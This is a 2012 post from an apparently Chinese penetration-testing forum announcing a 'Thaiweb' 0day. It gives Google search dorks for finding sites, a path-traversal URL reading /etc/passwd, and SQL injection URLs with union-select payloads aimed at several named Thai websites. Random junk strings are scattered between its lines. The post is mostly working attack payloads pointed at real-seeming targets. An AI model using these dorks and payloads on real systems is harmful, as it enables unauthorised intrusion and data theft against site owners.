中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
, r! M z I8 y
S: H' @- d6 n
intext:powered by Thaiweb
0 R* D, W* M; z5 q
$ I% s# G' Q$ P6 d! g6 W4 A
inurl:index.php?page=board.php
" l( B8 y8 F' \/ `( N
8 Q2 q* g: t: ?
' Q7 `& r9 E( j1 p- z) V
3 b6 s$ y7 B. E; s
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
% [7 W' X7 {+ W% M- Z% x
) z! e# A) X& D! r+ h, E, v0 j
. J1 X7 r2 n/ r$ z6 t$ i
: E5 b9 x1 q4 o4 ], N6 O
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
9 v9 k! m/ o' G0 \% C% a
V) U/ ]5 a2 D. z. o
: q1 V, X0 B; d2 f, q' k
! v; e4 M, q+ N! S- }7 V$ x8 }$ G
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
; }# [& b: K, U% I/ M( k6 n
' D! L; D+ P5 x+ S& t
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
5 I8 N% @. S+ h: @* B
0 e1 U( ~7 @/ e4 E c
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
) U' X! a6 t* I% Q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2